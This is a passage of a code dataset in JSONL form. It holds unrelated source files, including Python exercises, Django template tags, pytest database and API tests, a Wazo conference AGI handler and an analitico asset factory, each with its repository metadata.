myPalindrome,接收一个字串参数。\n用递回的方式检查此字串是否为对称。\n效果等于 s == s[::-1]。\n\"\"\"\ndef myPalindrome(string):\n if len(string) <= 1:\n return True\n else:\n if string[0] == string[-1]:\n return myPalindrome(string[1:-1])\n else:\n return False\n\nprint()\nprint(\"-Practice 3-\")\nprint(myPalindrome(input(\"输入一字串,将会判断是否为对称:\")))","repo_name":"fifionaLin/Python_Exercise","sub_path":"Lab7_Practice.py","file_name":"Lab7_Practice.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"27456799406","text":"from django import template\nfrom django.utils.safestring import mark_safe\nfrom django.utils.timezone import datetime, timedelta\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef get_model_verbose_name(model_obj):\n model_name = model_obj._meta.verbose_name if model_obj._meta.verbose_name else model_obj._meta.verbose_name_plural\n\n if not model_name:\n model_name = model_obj._meta.model_name\n\n print(\"model obj\", model_obj)\n return model_name.capitalize()\n\n\n@register.simple_tag\ndef get_model_name(model_obj):\n return model_obj._meta.model_name\n\n\n@register.simple_tag\ndef get_app_name(model_obj):\n return model_obj._meta.app_label\n\n\n@register.simple_tag\ndef build_table_row(admin_obj, obj):\n row_ele = \"\"\n\n for column in admin_obj.list_display:\n column_obj = obj._meta.get_field(column)\n if column_obj.choices:\n get_column_data = getattr(obj, \"get_%s_display\" % column)\n column_data = get_column_data()\n else:\n column_data = getattr(obj, column)\n if type(column_data).__name__ == 
'datetime':\n column_data = column_data.strftime('%Y-%m-%d %H:%M:%S')\n\n td_ele = '''%s''' % column_data\n row_ele += td_ele\n\n return mark_safe(row_ele)\n\n\n@register.simple_tag\ndef get_filter_field(filter_column, admin_obj):\n # print(\"admin obj\",admin_obj.model ,filter_column)\n # 获取数据库中的字段对象,用来获取choices\n field_obj = admin_obj.model._meta.get_field(filter_column)\n select_ele = \"\"\"'\n return mark_safe(select_ele)\n\n\n@register.simple_tag\ndef get_orderby_key(request, colomn):\n order_key = request.GET.get('o')\n if order_key == colomn: # 当前列有排序\n if order_key.startswith('-'):\n return order_key.strip('-')\n else:\n return '-%s' % colomn\n return colomn\n\n\n@register.simple_tag\ndef generate_filter_url(request, admin_obj):\n q = request.GET.get('q')\n url = ''\n if admin_obj.filter_conditions:\n for k, v in admin_obj.filter_conditions.items():\n url += \"%s=%s\" % (k, v)\n if q:\n url += \"&q=%s\" % q\n return url\n\n\n@register.simple_tag\ndef display_order_by_icon(request, column):\n order_field = request.GET.get('o')\n if order_field: # 查找到被排序的列\n if order_field.strip('-') == column: # 当前列被排序\n # print('当前列被排序列:', column)\n if order_field.startswith('-'):\n icon = 'bottom'\n else:\n icon = 'top'\n ele = \"\"\"\"\"\" % icon\n\n return mark_safe(ele)\n return ''\n\n\n@register.filter\ndef get_search_field(request):\n '''\n return the field value of 'q' to frontier\n :param request:\n :return:\n '''\n field = request.GET.get('q')\n return field\n\n\n@register.simple_tag\ndef generate_paginator(request, page_info, admin_obj):\n '''\n 生成分页器显示\n '''\n q = request.GET.get('q', '')\n o = request.GET.get('o', '')\n condition = ''\n if admin_obj.filter_conditions:\n for k, v in admin_obj.filter_conditions.items():\n condition += \"%s=%s&\" % (k, v)\n condition += 'q=%s&' % q\n condition += 'o=%s&' % o\n\n length = page_info['length'] # int\n last = page_info['last'] # int #最后一个页面\n current = page_info['current'] # int 当前页面\n num_container = int(last / length) # 要用给多少容器\n position = int(current / length) # 第几个容器\n if last % length: # 最后一排有余数\n num_container += 1\n if current % length: # 要多拿一个容器\n position += 1\n start = (position - 1) * length + 1\n if last: # 有数据\n ele = ''\n # 有上一排\n if position > 1:\n ele += '''
  • \n «
  • ''' % (condition, start - 1)\n # 写数据\n range_flag = start + length\n if start + 5 > last:\n range_flag = last + 1 # 要取到最后一个\n tmp = start\n while tmp < range_flag:\n if current == tmp:\n ele += '''
  • %s
  • ''' % (condition, tmp, tmp)\n else:\n ele += '''
  • %s
  • ''' % (condition, tmp, tmp)\n tmp += 1\n if position < num_container:\n ele += '''
  • \n »
  • ''' % (condition, start + 5)\n\n return mark_safe(ele)\n return ''\n","repo_name":"if000else/PerfectCRM","sub_path":"kingadmin/templatetags/kingadmin_tags.py","file_name":"kingadmin_tags.py","file_ext":"py","file_size_in_byte":6402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40687244296","text":"print(\"\\n**** CALCULADORA DE CALORIAS DIÁRIAS ****\")\r\nquantidade_alimento = int(input(\"\\nDigite a quantidade de alimentos ingeridos no seu dia: \"))\r\nsoma = 0\r\n\r\nfor x in range(1, quantidade_alimento+1):\r\n calorias_alimentos = float(input(\"Informe a quantidade de calorias do alimento {}: \".format(x)))\r\n soma = soma + calorias_alimentos\r\nprint(\"\\n O TOTAL DE CALORIAS INGERIDAS É DE: {} Kcal\".format(soma))\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"GustavoPetry/Solving-Python","sub_path":"004 - Calculadora de Calorias.py","file_name":"004 - Calculadora de Calorias.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6475713929","text":"from os import path\nfrom pathlib import Path\nfrom unittest.mock import Mock\n\nimport pytest\nfrom alembic.config import Config\nfrom alembic.migration import MigrationContext\nfrom alembic.script import ScriptDirectory\nfrom sqlalchemy import select\n\nfrom covalent_dispatcher._db import models\nfrom covalent_dispatcher._db.datastore import DataStore\n\nfrom .fixtures import workflow_fixture\n\n\n@pytest.fixture\ndef db():\n \"\"\"Instantiate and return an in-memory database.\"\"\"\n\n return DataStore(\n db_URL=\"sqlite+pysqlite:///:memory:\",\n initialize_db=True,\n )\n\n\ndef test_db_path(db: DataStore, tmp_path: Path):\n db_dir_path = tmp_path / \"db_dir\"\n db_dir_path.mkdir()\n db_path = db_dir_path / \"my_db.sqlite\"\n\n db_url = f\"sqlite+pysqlite:///{str(db_path.resolve())}\"\n\n db = DataStore(db_URL=db_url, initialize_db=True)\n assert db.db_URL == db_url\n\n\ndef test_default_db_path(db: DataStore, tmp_path: Path, mocker):\n DB_PATH = \"/tmp/my_db.sqlite\"\n\n mocker.patch(\"sqlalchemy.create_engine\")\n mocker.patch(\"sqlalchemy.orm.sessionmaker\")\n mocker.patch(\"covalent_dispatcher._db.datastore.get_config\", return_value=DB_PATH)\n\n db_url = f\"sqlite+pysqlite:///{DB_PATH}\"\n\n assert DataStore().db_URL == db_url\n\n\ndef test_run_migrations(db: DataStore, mocker):\n config_mock = Mock()\n command_mock = mocker.patch(\"covalent_dispatcher._db.datastore.command\")\n\n def get_config_mock(logging_enabled):\n return config_mock\n\n mocker.patch.object(db, \"get_alembic_config\", get_config_mock)\n\n db.run_migrations()\n command_mock.upgrade.assert_called_once_with(config_mock, \"head\")\n\n\ndef test_current_head(db: DataStore, mocker):\n MOCK_REVISION = \"8a15\"\n script_mock = Mock()\n mocker.patch.object(ScriptDirectory, \"from_config\", lambda config: script_mock)\n script_mock.get_current_head.return_value = MOCK_REVISION\n assert db.current_head() == MOCK_REVISION\n\n\ndef test_current_revision(db: DataStore, mocker):\n MOCK_REVISION = \"8a15\"\n script_mock = Mock()\n migration_ctx_mock = Mock()\n mocker.patch(\"covalent_dispatcher._db.datastore.EnvironmentContext\")\n mocker.patch.object(db, \"engine\", Mock())\n mocker.patch.object(ScriptDirectory, \"from_config\", lambda config: script_mock)\n mocker.patch.object(\n MigrationContext, \"configure\", lambda config, environment_context=None: migration_ctx_mock\n )\n\n 
migration_ctx_mock.get_current_revision.return_value = MOCK_REVISION\n\n assert db.current_revision() == MOCK_REVISION\n\n\ndef test_get_alembic_config(db: DataStore, mocker):\n config_mock = mocker.patch(\"covalent_dispatcher._db.datastore.Config\")\n\n def alembic_config_init(self, provided_path):\n # ensure provided path matches project root / alembic.ini\n assert provided_path == Path(path.join(__file__, \"./../../../../alembic.ini\")).resolve()\n\n mocker.patch.object(Config, \"__init__\", alembic_config_init)\n assert db.get_alembic_config() == config_mock()\n\n\n@pytest.mark.usefixtures(\"workflow_fixture\")\ndef test_insertion(db: DataStore, workflow_fixture):\n electron_dependency = workflow_fixture[\"electron_dependency\"][0]\n with db.session() as session:\n session.add(electron_dependency)\n session.commit()\n with db.session() as session:\n statement = select(models.ElectronDependency)\n results = session.execute(statement).all()\n assert len(results) == 1\n","repo_name":"AgnostiqHQ/covalent","sub_path":"tests/covalent_dispatcher_tests/_db/db_test.py","file_name":"db_test.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":584,"dataset":"github-code","pt":"66"} +{"seq_id":"33619869162","text":"import pytest\n\nimport json\n\n\n@pytest.mark.pgsql(\n 'eats_notifications',\n queries=[\n \"\"\"\n INSERT INTO eats_notifications.projects (name, key, tanker_project,\n tanker_keyset, intent)\n VALUES ('project_name_test', 'project_key_test', 'tanker_project_test',\n 'tanker_keyset_test', 'intent_test')\n \"\"\",\n \"\"\"\n INSERT INTO eats_notifications.templates (name, key, project_id,\n transport_type, waiting_condition, ttl)\n VALUES ('template_name_test', 'template_key_test', 1, 0, 'sent', 0)\n \"\"\",\n \"\"\"\n INSERT INTO eats_notifications.notifications (token, status,\n project_id, template_id, user_id, application, user_device_id,\n notification_params, message_title, message_body, deeplink,\n api_response, request, message_id, client_type, sent_at,\n sent_transport_type, personal_phone_id)\n VALUES ('test_token', 'skipped', 1, 1, 'test_user_id',\n 'test_application', 'test_user_device_id', '{}',\n 'test_message_title', 'test_message_body', 'test_deeplink',\n 'test_api_response', 'test_request', 'test_message_id',\n 'client-notify', '2021-07-28T18:00:00+00:00', 'push',\n 'personal_phone_id_test')\n \"\"\",\n \"\"\"\n INSERT INTO eats_notifications.user_devices\n (user_id, auth_token, active, device_id, model, brand)\n VALUES ('test_user_id', 'x_taxi_session_value', TRUE,\n 'test_user_device_id', 'model_test', 'brand_test'),\n ('test_user_id_2', 'x_taxi_session_value_1', FALSE,\n 'test_user_device_id', 'model_test', 'brand_test')\n \"\"\",\n ],\n)\n@pytest.mark.parametrize(\n 'request_json', [pytest.param({'tokens': ['test_token']})],\n)\nasync def test_200(taxi_eats_notifications, taxi_config, request_json):\n # get history\n response = await taxi_eats_notifications.post(\n '/v1/notification/get-history', json=request_json,\n )\n assert response.status_code == 200\n assert len(response.json()['notifications']) == 1\n assert (\n response.json()['notifications'][0]['application']\n == 'test_application'\n )\n assert (\n response.json()['notifications'][0]['client_type'] == 'client-notify'\n )\n assert response.json()['notifications'][0]['deeplink'] == 'test_deeplink'\n assert (\n response.json()['notifications'][0]['message_body']\n == 'test_message_body'\n )\n assert (\n response.json()['notifications'][0]['message_id'] 
== 'test_message_id'\n )\n assert (\n response.json()['notifications'][0]['message_title']\n == 'test_message_title'\n )\n assert (\n response.json()['notifications'][0]['sent_at']\n == '2021-07-28T18:00:00+00:00'\n )\n assert response.json()['notifications'][0]['status'] == 'skipped'\n assert response.json()['notifications'][0]['token'] == 'test_token'\n assert response.json()['notifications'][0]['user_id'] == 'test_user_id'\n assert (\n response.json()['notifications'][0]['device']\n == 'brand_test model_test'\n )\n assert (\n response.json()['notifications'][0]['personal_phone_id']\n == 'personal_phone_id_test'\n )\n assert response.json()['notifications'][0]['transport_type'] == 'push'\n\n\n@pytest.mark.parametrize(\n 'body_tags, expected_result',\n [\n pytest.param(\n [\n {'key': 'city', 'value': 'moscow'},\n {'key': 'order_id', 'value': 'order_id-123'},\n ],\n {\n 'notification_token-1': {\n 'expected_tags': [\n {'key': 'group', 'value': 'group-2'},\n {'key': 'order_id', 'value': 'order_id-123'},\n {'key': 'city', 'value': 'moscow'},\n ],\n },\n 'notification_token-3': {\n 'expected_tags': [\n {'key': 'group', 'value': 'group-1'},\n {'key': 'order_id', 'value': 'order_id-123'},\n {'key': 'city', 'value': 'moscow'},\n ],\n },\n },\n marks=[\n pytest.mark.pgsql(\n 'eats_notifications',\n queries=[\n \"\"\"\n INSERT INTO eats_notifications.notifications_tags\n (key, value, notification_token, updated_at)\n VALUES ('order_id', 'order_id-123', 'notification_token-1', '2021-07-28T18:00:00+00:00'),\n ('group', 'group-2', 'notification_token-1', '2021-07-28T18:00:00+00:00'),\n ('order_id', 'order_id-321', 'notification_token-2', '2021-07-28T18:00:00+00:00'),\n ('order_id', 'order_id-123', 'notification_token-3', '2021-07-28T18:00:00+00:00'),\n ('city', 'moscow', 'notification_token-3', '2021-07-28T18:00:00+00:00'),\n ('city', 'moscow', 'notification_token-1', '2021-07-28T18:00:00+00:00'),\n ('city', 'moscow', 'notification_token-4', '2021-07-28T18:00:00+00:00'),\n ('group', 'group-1', 'notification_token-3', '2021-07-28T18:00:00+00:00');\n \"\"\",\n \"\"\"\n INSERT INTO eats_notifications.notifications \n (token, status, notification_params, message_title, message_body, sent_at)\n VALUES ('notification_token-1', 'sent', '{}', '', '', '2021-07-28T18:00:00+00:00'),\n ('notification_token-2', 'sent', '{}', '', '', '2021-07-28T18:00:00+00:00'),\n ('notification_token-3', 'sent', '{}', '', '', '2021-07-28T18:00:00+00:00'),\n ('notification_token-4', 'sent', '{}', '', '', '2021-07-28T18:00:00+00:00')\n \"\"\",\n ],\n ),\n ],\n id='Filtering',\n ),\n pytest.param(\n [\n {'key': 'city', 'value': 'moscow'},\n {'key': 'order_id', 'value': 'order_id-123'},\n ],\n {},\n id='No tokens found',\n ),\n ],\n)\nasync def test_find_history_by_tags(\n taxi_eats_notifications, pgsql, expected_result, body_tags,\n):\n body = {'tags': body_tags}\n\n expected_tokens = expected_result.keys()\n\n response = await taxi_eats_notifications.post(\n '/v1/notification/get-history-by-tags', json=body,\n )\n assert response.status_code == 200\n\n notifications = response.json()['notifications']\n\n tokens = [item['notification']['token'] for item in notifications]\n assert sorted(tokens) == sorted(expected_tokens)\n\n for item in notifications:\n token = item['notification']['token']\n expected_tags = expected_result[token]['expected_tags']\n assert sorted(item['tags'], key=lambda x: x['value']) == sorted(\n expected_tags, key=lambda x: x['value'],\n 
)\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_eats_notifications/test_notification_history.py","file_name":"test_notification_history.py","file_ext":"py","file_size_in_byte":7183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43169901848","text":"# _*_ coding:utf-8 _*_\r\nimport requests\r\nfrom Scripts.ConfigFile import *\r\nfrom Scripts.GetCurrentTime import *\r\nfrom Scripts.GetReport import *\r\n\r\n\r\nclass QQLogin:\r\n def qq_login(self, openid):\r\n \"\"\"\r\n QQ登录\r\n :param openid:\r\n :return:\r\n \"\"\"\r\n post_data = {\"type\": \"qq\", # QQ: 'qq'; 微信: 'weixin'\r\n \"openid\": openid, # 第三方平台的唯一标识\r\n \"auth_token\": \"\" # 第三方平台的授权码\r\n }\r\n headers = {\"Cache - Control\": \"no - cache\",\r\n \"Content - Type\": \"text / html;charset = UTF - 8\",\r\n 'Accept': 'application/json',\r\n \"Date\": \"%s\" % GetCurrentTime().getHeaderTime(),\r\n \"Proxy - Connection\": \"Keep - alive\",\r\n \"Server\": \"nginx / 1.9.3(Ubuntu)\",\r\n \"Transfer - Encoding\": \"chunked\"}\r\n third_login_url = \"http://%s/user/thirdlogin\" % ConfigFile().host()\r\n request = requests.post(third_login_url, data=post_data, headers=headers)\r\n time = GetCurrentTime().getCurrentTime()\r\n status_code = request.status_code\r\n try:\r\n if status_code in (200, 422):\r\n json = request.json()\r\n info = json[\"info\"]\r\n return json\r\n else:\r\n info = request.reason\r\n finally:\r\n log_list = [u'QQ登录', u\"post\", third_login_url, str(post_data), time, status_code, info]\r\n GetReport().get_report() # 生成或打开日志文件\r\n GetReport().record_into_report(log_list) # 逐条写入日志\r\n\r\n\r\nif __name__ == \"__main__\":\r\n r = QQLogin()\r\n print(r.qq_login(\"openid\"))\r\n","repo_name":"AbigaleLiu/WuKongDianJing","sub_path":"Scripts/APIScripts/Other/QQLogin.py","file_name":"QQLogin.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"402293509","text":"def maxRotateFunction(nums) -> int:\n # from given pattern\n # derived the formula for F(k) as follows\n # F(k) = F(k-1) + SUM + N * arr[N - k]\n\n n = len(nums)\n S = sum(nums)\n\n prefixSum = 0\n for i, val in enumerate(nums):\n prefixSum += (i * val)\n\n maxVal = prefixSum\n for i in range(1, n):\n prefixSum = prefixSum + S - (n * nums[-i])\n maxVal = max(maxVal, prefixSum)\n\n return maxVal\n\n\nn1 = [4, 3, 2, 6]\nn2 = [100]\n\nprint(maxRotateFunction(n1))\n","repo_name":"SahilDeb/6Companies30days","sub_path":"Microsoft_Company_1/RotateFunction.py","file_name":"RotateFunction.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22923116043","text":"from math import sqrt\n\nclass Solution:\n # @param A : integer\n # @return a list of integers\n def sieve(self, A):\n if A < 2:\n return []\n check_primes = [1]* A\n check_primes.append(1)\n \n primes = []\n primes.append(2)\n primes.append(3)\n primes.append(5)\n primes.append(7)\n primes.append(11)\n \n sqa = int(sqrt(A))\n for i in xrange(3, sqa+1, 2):\n if check_primes[i] ==1:\n for j in xrange(i*i, A+1, i): # start at square of current prime as an optimization\n check_primes[j] = 0\n primes.append(i)\n next = sqa if sqa % 2 == 1 else sqa+1\n for i in xrange(next, A+1, 2):\n if check_primes[i] == 1:\n primes.append(i)\n return primes\n \n def primesum(self, A):\n primes = self.sieve(A)\n set_primes = set(primes)\n for i 
in primes:\n if A-i in set_primes:\n return (i, A-i)\n return []\n","repo_name":"rsubbu55/coding-prep","sub_path":"i-b/math/prime-sum.py","file_name":"prime-sum.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43316076024","text":"from tkinter import *\nimport re\n\n\nroot = Tk()\nroot.minsize(800, 600)\ntext = Text(root, width=800//10, height=600//20)\n\n#re.sub('[ES]', 'a', s)\ndef writeOut():\n global text\n words = text.get(\"1.0\",\"end-1c\")\n new_words = []\n hyphenated_words = re.findall(r\"\\w+(?:- \\S+\\w+)+\", words)\n for x in hyphenated_words:\n nx = x.replace(\"- \", \"\")\n words = words.replace(x, nx)\n print(words)\n\n## print(type(hyphenated_words))\n## print(re.search(r\"\\w+(?:- \\S+\\w+)+\", words).group(0))\n #print(re.sub(r\"\\w+(?:- \\S+\\w+)+\", \"\\b\", words))\n f = open(\"output.txt\", \"w\")\n f.write(text.get(\"1.0\",\"end-1c\"))\n f.close()\n\n\n\n\nB = Button(root, text=\"Format And Writeout\", command=writeOut)\nB.place(x = 800//2, y = 600//3)\ntext.pack()\nB.pack()\nroot.mainloop()\n","repo_name":"vasunep0306/antihiphen","sub_path":"perfect_formatter.py","file_name":"perfect_formatter.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12407933048","text":"from __future__ import annotations\n\nfrom psycopg2.extras import DictCursor\n\nfrom wazo_agid import agid\nfrom xivo_dao.resources.conference import dao as conference_dao\n\n\ndef incoming_conference_set_features(\n agi: agid.FastAGI, cursor: DictCursor, args: list[str]\n) -> None:\n conference_id = int(agi.get_variable('XIVO_DSTID'))\n\n try:\n conference = conference_dao.get(conference_id)\n except ValueError as e:\n agi.dp_break(str(e))\n\n menu = 'xivo-default-user-menu'\n user_profile = f'xivo-user-profile-{conference.id}'\n if conference.pin:\n for _ in range(4):\n agi.answer()\n pin = agi.get_data('conf-getpin', 10000, 80)\n if pin == conference.pin:\n break\n elif pin == conference.admin_pin:\n menu = 'xivo-default-admin-menu'\n user_profile = f'xivo-admin-profile-{conference.id}'\n break\n else:\n agi.stream_file('conf-invalidpin')\n else:\n agi.dp_break(\n 'Unable to join the conference room, wrong pin'\n f'(conference_id: {conference.id}, name: {conference.name})'\n )\n\n agi.set_variable('WAZO_CONFBRIDGE_ID', conference.id)\n agi.set_variable('WAZO_CONFBRIDGE_TENANT_UUID', conference.tenant_uuid)\n agi.set_variable(\n 'WAZO_CONFBRIDGE_BRIDGE_PROFILE', f'xivo-bridge-profile-{conference.id}'\n )\n agi.set_variable('WAZO_CONFBRIDGE_USER_PROFILE', user_profile)\n agi.set_variable('WAZO_CONFBRIDGE_MENU', menu)\n agi.set_variable(\n 'WAZO_CONFBRIDGE_PREPROCESS_SUBROUTINE', conference.preprocess_subroutine or ''\n )\n agi.appexec('CELGenUserEvent', f'WAZO_CONFERENCE, NAME: {conference.name or \"\"}')\n\n\nagid.register(incoming_conference_set_features)\n","repo_name":"wazo-platform/wazo-agid","sub_path":"wazo_agid/modules/incoming_conference_set_features.py","file_name":"incoming_conference_set_features.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38373921898","text":"import numpy as np\nimport cv2 as cv\nimport operator\nfrom heapq import nlargest\n\nclass kdTree():\n\tdef __init__(self, rootid):\n\t\tself.left = None\n\t\tself.right = None\n\t\tself.rootid = rootid\n\ndef 
get_leaf_nodes(node):\n\tleafs = []\n\tif node is not None:\n\t\tif node.left is None and node.right is None:\n\t\t\tleafs.append(node.rootid)\n\t\tleafs += get_leaf_nodes(node.left) + get_leaf_nodes(node.right)\n\treturn leafs\n\ndef readImage(imgName):\n\timg = cv.imread(imgName)\n\tfor i in range(len(img)):\n\t\tfor j in range(len(img[0])):\n\t\t\timg[i][j] = img[i][j]/8\n\t\t\timg[i][j] = img[i][j]*8\n\treturn img\n\ndef calHistogram(img):\n\thistogram = {}\n\tfor row in img:\n\t\tfor pixel in row:\n\t\t\tif (pixel[0], pixel[1], pixel[2]) in histogram:\n\t\t\t\thistogram[(pixel[0], pixel[1], pixel[2])] += 1\n\t\t\telse:\n\t\t\t\thistogram[(pixel[0], pixel[1], pixel[2])] = 0\n\treturn histogram\n\ndef showImage(name):\n\tcv.imshow('Quantised Image', name)\n\tk = cv.waitKey(0)\n\tif k == 27:\n\t\tcv.destroyAllWindows()\n\ndef growTree(points, k):\n\n\tif k == 1:\n\t\treturn None\n\n\tvar = (np.var(points, axis=0)).tolist()\n\tind = var.index(max(var))\n\tmed = (np.median(points, axis=0))[ind]\n\n\troot = kdTree(med)\n\tleft = [x for x in points if x[ind] < med]\n\tright = [x for x in points if x[ind] >= med]\n\n\tif k/2 != 1:\n\t\troot.left = growTree(left, k/2)\n\t\troot.right = growTree(right, k-k/2)\n\telse:\n\t\tavg = [0,0,0]\n\t\tfor i in range(0, len(points)):\n\t\t\t\tavg += points[i]\n\t\tavg = avg/float(len(points))\n\n\t\troot.rootid = avg\n\n\treturn root\n\ndef findKColors(image, K):\n\tlst = []\n\tfor i in range(0, len(image)):\n\t\tfor j in range(0, len(image[0])):\n\t\t\tlst.append(image[i][j])\n\ttree = growTree( lst , K)\n\n\tkColors = get_leaf_nodes(tree)\n\n\treturn kColors\n\ndef findDist(pixel, color):\n\td = 0\n\tfor i in range(len(pixel)):\n\t\td += (int(pixel[i]) - int(color[i]))**2\n\treturn d\n\ndef quantise(k_colors, histogram):\n\tlookUpt = {}\n\ti=0\n\tfor h in histogram.keys():\n\t\tminD = findDist(h, k_colors[0])\n\t\tval = k_colors[0]\n\t\tfor color in k_colors:\n\t\t\td = findDist(h, color)\n\t\t\tif d < minD:\n\t\t\t\tminD = d\n\t\t\t\tval = color\n\t\tlookUpt[h] = val\n\t\ti += 1\n\treturn lookUpt\n\ndef createFinalImage(img, lookUpt):\n\tfinalImg = img\n\tfor i in range(len(finalImg)):\n\t\tfor j in range(len(finalImg[0])):\n\t\t\tfinalImg[i][j] = lookUpt[(finalImg[i][j][0], finalImg[i][j][1], finalImg[i][j][2])]\n\treturn finalImg\n\nimage_path = input(\"Path to image: \")\nk = int(input(\"Quantisation level: \"))\n\nimage = readImage(image_path)\nhistogram = calHistogram(image)\nk_colors = findKColors(image, k)\nlookUpt = quantise(k_colors, histogram)\nfinalImg = createFinalImage(image, lookUpt)\nshowImage(finalImg)\n\n# # r = []\n# # g = []\n# # b = []\n# # for i in range(0, len(finalImg)):\n# # \tfor j in range(0, len(finalImg[0])):\n# # \t\tr.append(finalImg[0])\n# # \t\tg.append(finalImg[1])\n# # \t\tb.append(finalImg[2])\n\t\t\n# Hdat = []\n# Ldat = []\n# Sdat = [] \n# for row in finalImg:\n# \tfor pixel in row:\n# \t\th,l,s = colorsys.rgb_to_hls(pixel[0]/255., pixel[1]/255., pixel[2]/255.)\n# \t\tHdat.append(int(h*255.))\n# \t\tLdat.append(int(l*255.))\n# \t\tSdat.append(int(s*255.))\n\n# r.putdata(Hdat)\n# g.putdata(Ldat)\n# b.putdata(Sdat)\n# newimg = Image.merge('RGB',(r,g,b))\n# newimg.save('lenaHSV.png')","repo_name":"harsimrats/COL783","sub_path":"1/1b.py","file_name":"1b.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42834493394","text":"import io\nimport re\nimport json\nimport shutil\nimport tempfile\nimport os.path\n\nfrom 
django.core.validators import validate_email\nfrom rest_framework.exceptions import NotFound\n\nimport analitico\nimport analitico.plugin\nimport analitico.utilities\n\nfrom analitico.factory import Factory\n\nimport api.models\nimport api.plugin\n\n# import plugins for Supermercato24 (if available)\nimport s24.plugin # NOQA\n\n# pylint: disable=no-member\n\n\n##\n## ServerFactory\n##\n\n# analitico://item_type/item_id/asset_class/asset_id, eg: analitico://dataset/ds_xxx/assets/data.csv\nANALITICO_ASSET_RE = (\n r\"analitico:\\/\\/(?P[\\a-z]+)s\\/(?P[\\w]+)\\/(?Pdata|assets)\\/(?P[-\\w\\.]+)\"\n)\n\n\nclass ServerFactory(Factory):\n \"\"\" A factory used to run notebooks and plugins in the context of a server with direct access to items via SQL \"\"\"\n\n def __init__(self, job=None, mkdtemp=True, **kwargs):\n super().__init__(**kwargs)\n if job:\n self.set_attribute(\"job\", job)\n # special temp directory which is deleted automatically?\n if mkdtemp:\n self._temp_directory = tempfile.mkdtemp(prefix=\"analitico_temp_\")\n\n ##\n ## Temp and cache directories\n ##\n\n # Temporary directory which is deleted when factory is disposed\n _temp_directory = None\n\n def get_temporary_directory(self):\n \"\"\" Temporary directory is deleted when ServerFactory is disposed \"\"\"\n return self._temp_directory if self._temp_directory else super().get_temporary_directory()\n\n def get_artifacts_directory(self):\n \"\"\" Artifacts directory is a subdirectory of temporary and is deleted automatically \"\"\"\n artifacts_dir = os.path.join(self.get_temporary_directory(), \"artifacts\")\n if not os.path.isdir(artifacts_dir):\n os.mkdir(artifacts_dir)\n return artifacts_dir\n\n ##\n ## URL retrieval, authorization and caching\n ##\n\n def get_cache_asset(self, item, asset_class, asset_id):\n \"\"\" \n Returns filename of cached asset after downloading it if necessary. \n File should be used as read only and copied if it needs to be modified.\n \"\"\"\n asset = item._get_asset_from_id(asset_class, asset_id, raise404=True)\n assert asset\n # name of the file in cache is determined by its hash so all files are unique and\n # we do not need to check versions, eg. 
if we have it with the correct name it's\n # the correct version and we can save a rountrip to check with the server\n storage_file = self.get_cache_filename(asset[\"hash\"])\n\n # if not in cache already download it from storage\n if not os.path.isfile(storage_file):\n storage = item.storage\n assert storage\n _, storage_stream = storage.download_object_via_stream(asset[\"path\"])\n _, storage_file = self.get_cached_stream(storage_stream, asset[\"hash\"])\n return storage_file\n\n def get_url_stream(self, url, binary=False):\n \"\"\" Job runner retrieves assets directly from cloud storage while using super for regular URLs \"\"\"\n # temporarily while all internal urls are updated prepend analitico://\n if url.startswith(\"workspaces/ws_\"):\n url = \"analitico://\" + url\n\n # job runner reads assets straight from cloud storage\n match = re.search(ANALITICO_ASSET_RE, url)\n if match:\n # find asset indicated in the url\n item_id = match.group(\"item_id\")\n asset_class = match.group(\"asset_class\")\n asset_id = match.group(\"asset_id\")\n\n # TODO should check that current requestor has access rights to this item\n item = self.get_item(item_id)\n\n # replace shorthand /data/csv with /data/data.csv\n wants_json = False\n if asset_class == \"data\":\n if asset_id == \"csv\":\n asset_id = \"data.csv\"\n if asset_id == \"info\":\n asset_id = \"data.csv\"\n wants_json = True\n\n asset = item._get_asset_from_id(asset_class, asset_id, raise404=True)\n if wants_json:\n # format the same way as if it was returned by the server\n asset_json = json.dumps({\"data\": asset})\n return io.StringIO(asset_json)\n cache_filename = self.get_cache_asset(item, asset_class, asset_id)\n return open(cache_filename, \"rb\")\n # base class handles regular URLs\n return super().get_url_stream(url)\n\n def upload_artifacts(self, item):\n \"\"\" Uploads all files in the artifacts directory to the given item's data assets \"\"\"\n directory = self.get_artifacts_directory()\n for path in os.listdir(directory):\n fullpath = os.path.join(directory, path)\n # process only files (skip directories and .info files)\n if os.path.isfile(fullpath) and not path.endswith(\".info\"):\n path_size = os.path.getsize(fullpath)\n with open(fullpath, \"rb\") as f:\n # if asset has a .info companion read as extra info on the asset\n extras_path = fullpath + \".info\"\n extras = analitico.utilities.read_json(extras_path) if os.path.isfile(extras_path) else {}\n if fullpath.endswith(\".csv\") and \"rows\" not in extras:\n extras[\"rows\"] = analitico.utilities.get_csv_row_count(fullpath)\n # upload asset and extras, item will take care of saving to database\n item.upload_asset_stream(f, \"data\", path, path_size, None, path, extras)\n\n def restore_artifacts(self, item, artifacts_path=None, symlink=True):\n \"\"\" Restores artifacts stored by item to the artifacts directory \"\"\"\n assets = item.get_attribute(\"data\")\n if not assets:\n 